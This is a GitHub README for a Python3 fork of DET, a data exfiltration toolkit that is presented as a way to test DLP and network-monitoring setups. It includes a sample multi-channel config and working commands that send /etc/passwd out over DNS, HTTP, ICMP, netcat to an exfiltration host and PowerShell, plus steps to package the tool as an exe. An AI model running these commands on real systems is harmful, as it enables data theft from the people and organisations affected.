Skip to content
/ DET Public
forked from PaulSec/DET

(extensible) Data Exfiltration Toolkit (DET)

License

Notifications You must be signed in to change notification settings

lokiuox/DET

 
 

Repository files navigation

Black Hat Arsenal USA 2016 Black Hat Arsenal EU 2017

DET (extensible) Data Exfiltration Toolkit - Python3 Port

DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time.

The idea was to create a generic toolkit to plug any kind of protocol/service to test implmented Network Monitoring and Data Leakage Prevention (DLP) solutions configuration, against different data exfiltration techniques.

Features of this fork:

  • Completely ported to Python3
  • Made into a Python package (no setup.py for now)
  • Fixed concurrency issues (the listener would not work correctly with multiple connections at the same time)
  • Optimized the code a little and updated to work with newer libraries
  • Added a script to build an exe with PyInstaller (Windows only)
  • Fixed a bunch of issues

Slides

DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here.

Installation

Clone the repo:

git clone https://github.com/lokiuox/DET.git

Then:

pip install -r requirements.txt --user

Configuration

In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase, proxies and so on). A configuration example file has been provided and is called: config-sample.json

{
    "plugins": {
        "http": {
            "target": "192.168.0.12",
            "port": 8080,
            "proxies": ["192.168.0.13", "192.168.0.14"]
        },
        "google_docs": {
            "target": "conchwaiter.uk.plak.cc",
            "port": 8080 
        },        
        "dns": {
            "key": "google.com",
            "target": "192.168.0.12",
            "port": 53,
            "proxies": ["192.168.0.13", "192.168.0.14"]
        },
[...SNIP...]
        "icmp": {
            "target": "192.168.0.12",
            "proxies": ["192.168.0.13", "192.168.0.14"]
        },
        "slack": {
            "api_token": "xoxb-XXXXXXXXXXX",
            "chan_id": "XXXXXXXXXXX",
            "bot_id": "<@XXXXXXXXXXX>:"
        },
        "smtp": {
            "target": "192.168.0.12",
            "port": 25,
            "proxies": ["192.168.0.13", "192.168.0.14"]
        },
        "ftp": {
            "target": "192.168.0.12",
            "port": 21,
            "proxies": ["192.168.0.13", "192.168.0.14"]
        },
        "sip": {
            "target": "192.168.0.12",
            "port": 5060,
            "proxies": ["192.168.0.13", "192.168.0.14"]
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "max_time_sleep": 10,
    "min_time_sleep": 1,
    "max_bytes_read": 400,
    "min_bytes_read": 300,
    "compression": 1
}

Usage

Help usage

python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L | -Z]

Data Exfiltration Toolkit (@PaulWebSec)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode
  -Z          Proxy mode

Server-side:

To load every plugin:

python det.py -L -c ./config.json

To load only twitter and gmail modules:

python det.py -L -c ./config.json -p twitter,gmail

To load every plugin and exclude DNS:

python det.py -L -c ./config.json -e dns

Client-side:

To load every plugin:

python det.py -c ./config.json -f /etc/passwd

To load only twitter and gmail modules:

python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

To load every plugin and exclude DNS:

python det.py -c ./config.json -e dns -f /etc/passwd

You can also listen for files from stdin (e.g output of a netcat listener):

nc -lp 1337 | python det.py -c ./config.json -e http -f stdin

Then send the file to netcat:

nc $exfiltration_host 1337 -q 0 < /etc/passwd

Don't forget netcat's -q 0 option so that netcat quits once it has finished sending the file.

And in PowerShell (HTTP module):

PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Proxy mode:

In this mode the client will proxify the incoming requests towards the final destination. The proxies addresses should be set in config.json file.

python det.py -c ./config.json -p dns,icmp -Z

Standalone package

DET has been adapted in order to run as a standalone executable with the help of PyInstaller.

pip install pyinstaller

The spec file det.spec is provided in order to help you build your executable.

# -*- mode: python -*-

block_cipher = None

import sys
sys.modules['FixTk'] = None

a = Analysis(['det.py'],
             pathex=['.'],
             binaries=[],
             datas=[('plugins', 'plugins'), ('config-sample.json', '.')],
             hiddenimports=['plugins/dns', 'plugins/icmp'],
             hookspath=[],
             runtime_hooks=[],
             excludes=['FixTk', 'tcl', 'tk', '_tkinter', 'tkinter', 'Tkinter'],
             win_no_prefer_redirects=False,
             win_private_assemblies=False,
             cipher=block_cipher)
pyz = PYZ(a.pure, a.zipped_data,
             cipher=block_cipher)
exe = EXE(pyz,
          a.scripts,
          a.binaries,
          a.zipfiles,
          a.datas,
          name='det',
          debug=False,
          strip=False,
          upx=True,
          console=True )

Specify the modules you need to ship with you executable by editing the hiddenimports array. In the example above, PyInstaller will package the DNS and ICMP plugins along with your final executable. Finally, launch PyInstaller:

pyinstaller det.spec

Please note that the number of loaded plugins will reflect on the size of the final executable. If you have issues with the generated executable or found a workaround for a tricky situation, please open an issue so this guide can be updated for everyone.

Modules

So far, DET supports multiple protocols, listed here:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (Direct SMTP + Email service)
  • Raw TCP / UDP
  • FTP
  • SIP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
  • Derived Unique Key Per Transaction (DUKPT) key management

And other "services":

  • Github Gists
  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)
  • Slack

Roadmap

  • Add proper encryption (eg. AES-256) Thanks to ryanohoro
  • Compression (extremely important!) Thanks to chokepoint
  • Add support for C&C-like multi-host file exfiltration (Proxy mode)

References

Some pretty cool references/credits to people I got inspired by with their project:

Contact/Contributing

(Original author's contact info)
You can reach me on Twitter @PaulWebSec. Feel free if you want to contribute, clone, fork, submit your PR and so on.

License

DET is licensed under a MIT License.

About

(extensible) Data Exfiltration Toolkit (DET)

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 73.3%
  • HTML 16.2%
  • PowerShell 10.5%